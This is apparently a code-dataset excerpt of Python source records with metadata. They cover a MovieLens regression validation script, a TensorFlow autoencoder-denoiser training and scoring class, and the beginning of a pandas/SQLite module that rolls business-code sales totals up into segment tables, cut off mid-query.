"usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 34, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 35, "usage_type": "call"}, {"api_name": "landing.cc_forms.EmailCollectForm", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Informer.objects.all", "line_number": 50, "usage_type": "call"}, {"api_name": "models.Informer.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "models.Informer", "line_number": 50, "usage_type": "name"}, {"api_name": "landing.cc_forms.SocialForm", "line_number": 52, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 57, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 57, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 58, "usage_type": "call"}, {"api_name": "landing.cc_forms.SocialForm", "line_number": 60, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "362573624", "text": "#!/bin/env python3 -u\n\n#\n# Tests results of regression from t9a.py\n# andre@corp.insite.com.br - 2017-11-06\n#\n# parameters: t9c.py \n#\n\nimport pandas as pd\nimport numpy as np\nimport argparse\nimport os\nimport time\nimport math\nimport sys\n\nparser = argparse.ArgumentParser(description='Test results of movielens regression.')\nparser.add_argument('logdir', nargs=1, help='directory with data from the tensorflow run')\nparser.add_argument('--ratings', nargs=1, help='file containing ratings to be tested', required = True)\nparser.add_argument('--movies', nargs=1, help='file containing movie info', required = True)\nparser.add_argument('--csvout', nargs=1, help='output file with test results', required = True)\n\n\nargs = parser.parse_args()\nlogdir = args.logdir[0]\nprint(\"Directory: {}\".format(logdir))\n\nsys.stdout = open(logdir + \"/validation.out\", \"w\", 1)\nsys.stderr = sys.stdout\n\nratfile = args.ratings[0]\nprint(\"Ratings File: {}\".format(ratfile))\ncsvout = args.csvout[0]\nprint(\"Output CSV file: {}\".format(csvout))\nmovies_file = args.movies[0]\nprint(\"Movies file: {}\".format(movies_file))\n\n\nif \"linear\" in logdir:\n print(\"Linear activation\")\n t_regression = \"linear\"\nelif \"asigmoid\" in logdir:\n print(\"sigmoid activation\")\n t_regression = \"sigmoid\"\nelse:\n print(\"Hmmm. directory doesn't have a recognized type of regression (sigmoid or linear)\")\n sys.exit(1)\n\nif not os.path.exists(logdir):\n print(\"Diretory doesn't exist\")\n sys.exit(2)\n\nif not os.path.isdir(logdir):\n print(\"{} is not a directory\".format(logdir))\n sys.exit(3)\n\nif not os.path.exists(ratfile):\n print(\"{} does not exist\")\n sys.exit(4)\n\n\nt0 = time.perf_counter()\ndef loga(msg):\n now = time.perf_counter()\n print(\"%6.2f: %s\" % (now - t0, msg))\n\nmemb = pd.read_csv(logdir + \"/movie_embeddings.csv.gz\", header = None)\nloga(\"Movie embeddings: {}\".format(memb.shape))\nuemb = pd.read_csv(logdir + \"/user_embeddings.csv.gz\", header = None)\nloga(\"User embeddings: {}\".format(uemb.shape))\nubias = pd.read_csv(logdir + \"/user_bias.csv.gz\", header=None)\nloga(\"User Bias: {}\".format(ubias.shape))\nmbias = pd.read_csv(logdir + \"/movie_bias.csv.gz\", header=None)\nloga(\"Movie Bias: {}\".format(mbias.shape))\nmovies = pd.read_csv(movies_file)\nloga(\"Movies: {}\".format(movies.shape))\n\nloga(\"Loading ratings...\")\nratings = pd.read_csv(ratfile)\nloga(\"Ratings: {}\".format(ratings.shape))\nuserIds = np.sort(ratings['userId'].unique())\nloga(\"Unique users: {}\".format(userIds.shape))\ncsvfname = logdir + \"/\" + csvout\nprint(\"opening csv output file: {}\".format(csvfname))\noutf=open(csvfname, \"w\", buffering = 1)\n\nnum_features = uemb.shape[1]\nmean_ratings = movies['mean_ratings']\n\nprint('\"context\",\"num_movies\",\"mean_error\",\"mse\"', file=outf)\n#loga(\"{0},{1},{2:.3f},{3:.3f}\".format(i, num_movies, \n# (np.sum(validation_predicted_score) - np.sum(validation_actual_score))/num_movies, \n# np.sum(np.square(validation_predicted_score - validation_actual_score))/num_movies), file=outf)\nfor userId in userIds:\n loga(\"==== userId: {}\".format(userId))\n user_ratings = ratings.loc[ratings['userId'] == userId]\n user_movieIds = user_ratings['movieId'].values\n predicted_ratings = movies.loc[user_movieIds,]['mean_ratings'].values\n actual_ratings = user_ratings['rating'].values\n diff = actual_ratings - predicted_ratings\n print(\"diffs: {}\".format(diff))\n\n old_user_vector = None\n #np.random.shuffle(user_ratings)\n\n validation_movieIds = user_ratings['movieId'].values\n num_movies = validation_movieIds.shape[0]\n print(\"{0},{1},{2:.3f},{3:.3f}\".format(0, num_movies, \n np.mean(diff),\n np.mean(np.square(diff))), file=outf)\n\n for i in range(1, user_ratings.shape[0]):\n seen_movieIds = user_ratings[0:i]['movieId'].values\n validation_movieIds = user_ratings[i:]['movieId'].values\n # NUM_FEATURES x n\n #seen_actual_score = user_ratings[0:i]['rating'].values\n seen_actual_score = np.matrix(user_ratings[0:i]['rating']).T\n # TODO: precisa testar isto...\n seen_memb = memb.loc[seen_movieIds,] # (n, NUM_FEATURES)\n # loga(\"seen_movie embeddings: {}\".format(seen_memb))\n seen_movie_bias = mbias.loc[seen_movieIds].values\n #loga(\"DEBUG: seen_movie_bias: {} ({})\".format(seen_movie_bias, seen_movie_bias.shape))\n inversora = np.linalg.pinv(seen_memb)\n # loga(\"DEBUG: inverter matrix: {}\".format(inversora))\n score_offset = seen_actual_score - seen_movie_bias\n # loga(\"DEBUG: score offset: [{}] ({})\".format(score_offset.T, score_offset.shape))\n\n user_vector = np.matmul(inversora, score_offset)\n seen_user_bias = (score_offset - np.matmul(seen_memb, user_vector)).mean()\n if i == 1:\n rotation = 0\n else:\n loga(\"user_vector shapes: {} and {}\".format(old_user_vector.shape, user_vector.shape))\n rotation = np.matmul(np.transpose(old_user_vector), user_vector)/np.linalg.norm(old_user_vector)/np.linalg.norm(user_vector)\n if num_features > 1:\n try:\n loga(\" change in user vector: {}: {}: norm: {} to {}\".format(rotation, math.acos(rotation)*180/math.pi, np.linalg.norm(old_user_vector), np.linalg.norm(user_vector)))\n except:\n loga(\"Unexpected error:\", sys.exc_info()[0])\n loga(\"{0:f} {1} {2}\".format(rotation, old_user_vector, user_vector))\n\n old_user_vector = user_vector\n \n loga(\"User vector: {} ({}) [{}]\".format(user_vector.T, user_vector.shape, np.linalg.norm(user_vector)))\n #loga(\"DEBUG: shapes: {}, {}\".format(np.matmul(seen_memb, user_vector).shape, seen_movie_bias.shape))\n #loga(\"DEBUG: {}, {}\".format(np.matmul(seen_memb, user_vector), seen_movie_bias))\n seen_predicted_score = np.add(np.matmul(seen_memb, user_vector), seen_movie_bias)\n seen_predicted_score = np.minimum(np.maximum(0.5, seen_predicted_score + seen_user_bias), 5.0)\n loga(\" user bias: {}\".format(seen_user_bias))\n #loga(\" predicted score: {}\".format(predicted_score))\n #loga(\" actual scores: {}\".format(seen_actual_score))\n loga(\" fixed: context: {0} mse: {2:.3f}\".format(i, (np.sum(seen_predicted_score) - np.sum(seen_actual_score))/i, np.sum(np.square(seen_predicted_score - seen_actual_score))/i))\n \n validation_memb = memb.loc[validation_movieIds,].values\n validation_movie_bias = mbias.loc[validation_movieIds].values\n validation_predicted_score = np.minimum(5.0,np.maximum(0.5,np.add(np.add(np.matmul(validation_memb, user_vector), validation_movie_bias), seen_user_bias)))\n validation_actual_score = np.matrix(user_ratings[i:]['rating']).T\n loga(\" predicted: {} {}[t]\".format(validation_predicted_score.shape, np.transpose(validation_predicted_score)))\n loga(\" actual: {} {}[t]\".format(validation_actual_score.shape, validation_actual_score.T))\n validation_error = validation_actual_score - validation_predicted_score\n loga(\" error: {} {}\".format(validation_error.shape, validation_error.T))\n num_movies = validation_movieIds.shape[0]\n loga(\" context: {0} num elements: {1} avg error: {2:.3f} mse: {3:.3f}\".format(i, num_movies, \n (np.sum(validation_predicted_score) - np.sum(validation_actual_score))/num_movies, \n np.sum(np.square(validation_predicted_score - validation_actual_score))/num_movies))\n print(\"{0},{1},{2:.3f},{3:.3f}\".format(i, num_movies, \n (np.sum(validation_predicted_score) - np.sum(validation_actual_score))/num_movies, \n np.sum(np.square(validation_predicted_score - validation_actual_score))/num_movies), file=outf)\n loga(\"---\")\n \n\n", "sub_path": "t9c.py", "file_name": "t9c.py", "file_ext": "py", "file_size_in_byte": 7456, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 60, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 63, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 76, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 135, "usage_type": "attribute"}, {"api_name": "math.acos", "line_number": 138, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 138, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 138, "usage_type": "attribute"}, {"api_name": "sys.exc_info", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 145, "usage_type": "attribute"}, {"api_name": "numpy.add", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 169, "usage_type": "call"}]} +{"seq_id": "358276651", "text": "from base.base_train_multi import BaseTrainMulti\nfrom tqdm import tqdm\nimport numpy as np\nfrom time import sleep\nfrom time import time\nfrom utils.evaluations import save_results\n\n\nclass AutoencoderDenoiserTrainer(BaseTrainMulti):\n\n\n def __init__(self, sess, model, data, config, logger):\n super(AutoencoderDenoiserTrainer, self).__init__(sess, model, data, config, logger)\n self.batch_size = self.config.data_loader.batch_size\n self.noise_dim = self.config.trainer.noise_dim\n self.img_dims = self.config.trainer.image_dims\n # Inititalize the train Dataset Iterator\n self.sess.run(self.data.iterator.initializer)\n # Initialize the test Dataset Iterator\n self.sess.run(self.data.test_iterator.initializer)\n if self.config.data_loader.validation:\n self.sess.run(self.data.valid_iterator.initializer)\n self.best_valid_loss = 0\n self.nb_without_improvements = 0\n\n def train_epoch_ae(self):\n # Attach the epoch loop to a variable\n begin = time()\n # Make the loop of the epoch iterations\n loop = tqdm(range(self.config.data_loader.num_iter_per_epoch))\n ae_losses = []\n summaries = []\n image = self.data.image\n cur_epoch = self.model.cur_epoch_tensor.eval(self.sess)\n for _ in loop:\n loop.set_description(\"Epoch:{}\".format(cur_epoch + 1))\n loop.refresh() # to show immediately the update\n sleep(0.01)\n ae, sum_ae = self.train_step_ae(image, cur_epoch)\n ae_losses.append(ae)\n summaries.append(sum_ae)\n self.logger.info(\"Epoch {} terminated\".format(cur_epoch))\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=summaries)\n # Check for reconstruction\n if cur_epoch % self.config.log.frequency_test == 0:\n image_eval = self.sess.run(image)\n feed_dict = {self.model.image_input: image_eval, self.model.is_training_ae: False}\n reconstruction = self.sess.run(self.model.summary_op_ae, feed_dict=feed_dict)\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=[reconstruction])\n ae_m = np.mean(ae_losses)\n self.logger.info(\n \"Epoch: {} | time = {} s | loss AE= {:4f} \".format(\n cur_epoch, time() - begin, ae_m\n )\n )\n self.model.save(self.sess)\n\n def train_epoch_den(self):\n # Attach the epoch loop to a variable\n begin = time()\n # Make the loop of the epoch iterations\n loop = tqdm(range(self.config.data_loader.num_iter_per_epoch))\n den_losses = []\n summaries = []\n image = self.data.image\n cur_epoch = self.model.cur_epoch_tensor.eval(self.sess)\n for _ in loop:\n loop.set_description(\"Epoch:{}\".format(cur_epoch + 1))\n loop.refresh() # to show immediately the update\n sleep(0.01)\n den, sum_den = self.train_step_den(image, cur_epoch)\n den_losses.append(den)\n summaries.append(sum_den)\n self.logger.info(\"Epoch {} terminated\".format(cur_epoch))\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=summaries, summarizer=\"train_den\")\n # Check for reconstruction\n if cur_epoch % self.config.log.frequency_test == 0:\n image_eval = self.sess.run(image)\n noise = np.zeros_like(image_eval)\n feed_dict = {self.model.image_input: image_eval,self.model.noise_tensor: noise, self.model.is_training_ae: False}\n reconstruction = self.sess.run(self.model.summary_op_den, feed_dict=feed_dict)\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=[reconstruction], summarizer=\"train_den\")\n den_m = np.mean(den_losses)\n self.logger.info(\n \"Epoch: {} | time = {} s | loss DEN= {:4f} \".format(\n cur_epoch, time() - begin, den_m\n )\n )\n self.model.save(self.sess)\n\n def train_step_ae(self, image, cur_epoch):\n image_eval = self.sess.run(image)\n feed_dict = {\n self.model.image_input: image_eval,\n self.model.is_training_ae: True,\n }\n # Train Autoencoder\n _, lae, sm_ae = self.sess.run(\n [self.model.train_auto_op, self.model.auto_loss, self.model.summary_op_loss_ae],\n feed_dict=feed_dict,\n )\n return lae, sm_ae\n\n\n def train_step_den(self, image, cur_epoch):\n noise = np.random.normal(\n loc=0.0,\n scale=1.0,\n size=[self.config.data_loader.batch_size] + self.config.trainer.image_dims,\n )\n image_eval = self.sess.run(image)\n feed_dict = {\n self.model.image_input: image_eval,\n self.model.noise_tensor: noise,\n self.model.is_training_ae: False,\n }\n # Train Denoiser\n _, lden, sm_den = self.sess.run(\n [self.model.train_den_op, self.model.den_loss, self.model.summary_op_loss_den],\n feed_dict=feed_dict,\n )\n return lden, sm_den\n\n def test_epoch(self):\n self.logger.warn(\"Testing evaluation...\")\n scores_rec = []\n scores_den = []\n scores_pipe = []\n scores_pipe_2 = []\n scores_mask1 = []\n scores_mask2 = []\n scores_mask1_s = []\n scores_mask2_s = []\n summaries = []\n inference_time = []\n true_labels = []\n # Create the scores\n test_loop = tqdm(range(self.config.data_loader.num_iter_per_test))\n cur_epoch = self.model.cur_epoch_tensor.eval(self.sess)\n for _ in test_loop:\n test_batch_begin = time()\n test_batch, test_labels, ground_truth = self.sess.run([self.data.test_image, self.data.test_label, self.data.ground_truth])\n test_loop.refresh() # to show immediately the update\n sleep(0.01)\n feed_dict = {self.model.image_input: test_batch, self.model.ground_truth: ground_truth, self.model.is_training_ae: False}\n scores_rec += self.sess.run(self.model.rec_score, feed_dict=feed_dict).tolist()\n scores_den += self.sess.run(self.model.den_score, feed_dict=feed_dict).tolist()\n scores_pipe += self.sess.run(self.model.pipe_score, feed_dict=feed_dict).tolist()\n scores_pipe_2 += self.sess.run(self.model.pipe_score_2, feed_dict=feed_dict).tolist()\n scores_mask1 += self.sess.run(self.model.mask_score_1, feed_dict=feed_dict).tolist()\n scores_mask2 += self.sess.run(self.model.mask_score_2, feed_dict=feed_dict).tolist()\n scores_mask1_s += self.sess.run(self.model.mask_score_1_s, feed_dict=feed_dict).tolist()\n scores_mask2_s += self.sess.run(self.model.mask_score_2_s, feed_dict=feed_dict).tolist()\n summaries +=self.sess.run([self.model.summary_op_test],feed_dict=feed_dict)\n inference_time.append(time() - test_batch_begin)\n true_labels += test_labels.tolist()\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=summaries,summarizer=\"test\")\n true_labels = np.asarray(true_labels)\n inference_time = np.mean(inference_time)\n self.logger.info(\"Testing: Mean inference time is {:4f}\".format(inference_time))\n scores_rec = np.asarray(scores_rec)\n scores_den = np.asarray(scores_den)\n scores_pipe = np.asarray(scores_pipe)\n scores_pipe_2 = np.asarray(scores_pipe_2)\n scores_mask1 = np.asarray(scores_mask1)\n scores_mask2 = np.asarray(scores_mask2)\n scores_mask1_s = np.asarray(scores_mask1_s)\n scores_mask2_s = np.asarray(scores_mask2_s)\n # scores_scaled = (scores - min(scores)) / (max(scores) - min(scores))\n step = self.sess.run(self.model.global_step_tensor)\n percentiles = np.asarray(self.config.trainer.percentiles)\n save_results(\n self.config.log.result_dir,\n scores_rec,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"scores_rec\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_den,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"scores_den\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_pipe,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"scores_pipe_1\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_pipe_2,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"scores_pipe_2\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_mask1,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"mask_1\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_mask2,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"mask_2\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_mask1_s,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"mask_1_s\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_mask2_s,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"mask_2_s\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n\n\n", "sub_path": "trainers/autoencoder_denoiser_trainer.py", "file_name": "autoencoder_denoiser_trainer.py", "file_ext": "py", "file_size_in_byte": 11288, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "base.base_train_multi.BaseTrainMulti", "line_number": 9, "usage_type": "name"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 30, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 50, "usage_type": "call"}, {"api_name": "time.time", "line_number": 53, "usage_type": "call"}, {"api_name": "time.time", "line_number": 60, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 62, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 83, "usage_type": "call"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 106, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 138, "usage_type": "call"}, {"api_name": "time.time", "line_number": 141, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 144, "usage_type": "call"}, {"api_name": "time.time", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 171, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 172, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 186, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 200, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 214, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 228, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 242, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 256, "usage_type": "call"}, {"api_name": "utils.evaluations.save_results", "line_number": 270, "usage_type": "call"}]} +{"seq_id": "604964105", "text": "'''\nCreated on Dec 18, 2018\n\n@author: vahidrogo\n'''\n\nimport pandas as pd\nimport sqlite3 as sql\nimport threading\nfrom tkinter import messagebox as msg\n\nimport constants\nfrom progress import Progress\nimport utilities\n\n\nclass RollupTotals(threading.Thread):\n '''\n Parent class for SegmentTotals(), SegmentTotalsRegion(), \n CategoryTotals() and CategoryTotalsRegion().\n \n Creates a new table with the data fetched using the query \n set in each of the child classes.\n '''\n \n \n FIRST_QUARTER_COLUMN = 3\n \n\n def __init__(\n self, is_addon=False, is_category=True, is_region=False,\n is_business_code_totals=False\n ):\n super().__init__()\n \n self.is_addon = is_addon\n self.is_category = is_category\n self.is_region = is_region\n self.is_business_code_totals = is_business_code_totals\n \n self.title = constants.APP_NAME\n \n self.input_table_name = constants.BUSINESS_CODE_TOTALS_TABLE\n \n if self.is_addon:\n self.input_table_name += constants.ADDON_SUFFIX\n \n self.df = None\n \n self.query = ''\n self.rollup_id_name = ''\n self.rollup_table_name = ''\n \n \n def run(self):\n if self.is_addon:\n self.rollup_table_name += constants.ADDON_SUFFIX\n \n self.progress = Progress(self, self.title, abort=False)\n \n self.progress.update_progress(0, 'Fetching business code totals.')\n \n self._set_df()\n \n progress = 90 if self.is_region else 70\n \n self.progress.update_progress(progress, 'Preparing data.')\n \n if self.df is not None:\n # drops the old id column\n self.df.drop(constants.ID_COLUMN_NAME, axis=1, inplace=True)\n \n if not self.is_business_code_totals:\n # drops the business code id column\n self.df.drop(\n constants.BUSINESS_CODE_ID_COLUMN_NAME, axis=1, inplace=True\n )\n \n self._update_column_names()\n \n self._set_region_id_column()\n \n column_names = list(self.df)\n \n juri_column = (\n constants.REGION_ID_COLUMN_NAME if self.is_region \n else constants.TAC_COLUMN_NAME\n )\n \n # sets the columns that will be used in the table in the order \n # that they will be in\n new_column_names = [\n constants.ID_COLUMN_NAME, juri_column, self.rollup_id_name\n ] + column_names[self.FIRST_QUARTER_COLUMN:]\n \n self.df = self.df[new_column_names]\n \n self._group_by_new_id()\n \n progress = 95 if self.is_region else 85\n \n self.progress.update_progress(progress, 'Creating table.')\n \n self._create_table()\n \n self.progress.update_progress(100, 'Build complete.')\n \n self.progress.destroy()\n \n \n def _set_df(self):\n sql_code = 'ATTACH DATABASE ? AS ?'\n \n args = (str(constants.DB_PATHS[constants.STARS_DB]), constants.STARS_DB)\n \n con = sql.connect(\n constants.DB_PATHS[constants.STATEWIDE_DATASETS_DB], uri=True,\n timeout=constants.DB_TIMEOUT\n )\n \n db_attached = utilities.execute_sql(\n sql_code=sql_code, args=args, open_con=con, dontfetch=True\n )\n \n if db_attached:\n results = utilities.execute_sql(\n sql_code=self.query, open_con=con, getcursor=True\n )\n \n if results:\n column_names = [i[0] for i in results.description]\n \n data = results.fetchall()\n \n self.df = pd.DataFrame(data, columns=column_names)\n \n con.close()\n \n \n def _update_column_names(self):\n column_names = list(self.df)\n \n # changes column to \"id\" from \"new_id\"\n column_names[0] = constants.ID_COLUMN_NAME\n \n if self.is_region:\n tac_index = 1 if self.is_business_code_totals else 2\n \n # changes column to \"region_id\" from \"tac\"\n column_names[tac_index] = constants.REGION_ID_COLUMN_NAME\n \n # updates the column names in the dataframe\n self.df.columns = column_names\n \n \n def _set_region_id_column(self):\n # gets the regions id's from the id column\n region_id_column = self.df[\n constants.ID_COLUMN_NAME\n ].apply(lambda x: x.split('-')[0])\n \n self.df[constants.REGION_ID_COLUMN_NAME] = region_id_column\n \n\n def _group_by_new_id(self):\n column_names = list(self.df)\n \n group_columns = column_names[:self.FIRST_QUARTER_COLUMN]\n \n sum_columns = column_names[self.FIRST_QUARTER_COLUMN:]\n \n self.df = self.df.groupby(\n group_columns, as_index=False, sort=False\n )[sum_columns].sum()\n \n \n def _create_table(self):\n con = sql.connect(\n constants.DB_PATHS[constants.STATEWIDE_DATASETS_DB], \n timeout=constants.DB_TIMEOUT\n )\n \n try:\n with con:\n self.df.to_sql(\n self.rollup_table_name, con, if_exists='replace', \n index=False\n )\n \n except sql.OperationalError as e:\n msg.showerror(self.title, e)\n \n con.close()\n \n \nclass SegmentTotals(RollupTotals):\n '''\n Creates the \"segment_totals\" table in the \"statewide_datasets\"\n database. The table contains the amounts from the \n \"business_code_totals\" table also in \"statewide_datasets\" rolled\n up by \"segment_id\". The \"segment_id\" comes from the \"segments\" \n table in \"starsdb\" based on the \"business_code_id\" from the \n \"business_code_totals\" table.\n '''\n \n\n def __init__(self, is_addon=False):\n super().__init__(is_addon)\n \n self.title += ' - Segment Totals'\n \n self.query = f'''\n SELECT d.{constants.TAC_COLUMN_NAME} || '-' || \n s.{constants.ID_COLUMN_NAME} new_id, \n s.{constants.ID_COLUMN_NAME} {constants.SEGMENT_ID_COLUMN_NAME}, \n d.* \n \n FROM {self.input_table_name} d, \n {constants.STARS_DB}.{constants.BUSINESS_CODES_TABLE} b, \n {constants.STARS_DB}.{constants.SEGMENTS_TABLE} s\n \n WHERE d.{constants.BUSINESS_CODE_ID_COLUMN_NAME}\n =b.{constants.ID_COLUMN_NAME} \n AND b.{constants.SEGMENT_ID_COLUMN_NAME}\n =s.{constants.ID_COLUMN_NAME} \n '''\n \n self.rollup_id_name = constants.SEGMENT_ID_COLUMN_NAME\n \n self.rollup_table_name = 'segment_totals'\n \n self.start()\n \n \nclass SegmentTotalsRegion(RollupTotals):\n '''\n Creates the \"segment_totals_region\" table in the \"statewide_datasets\"\n database. The table contains the amounts from the \n \"business_code_totals\" table also in \"statewide_datasets\" rolled up by\n \"segment_id\" and \"region_id\". The \"segment_id\" comes from the \n \"segments\" table in \"starsdb\" based on the \"business_code_id\" from the \n \"business_code_otals\" table. The \"region_id\" comes from the \n \"jurisdictions\" table also in \"starsdb\".\n '''\n \n\n def __init__(self):\n super().__init__(is_region=True)\n \n self.title += ' - Segment Totals Region'\n \n self.query = f'''\n 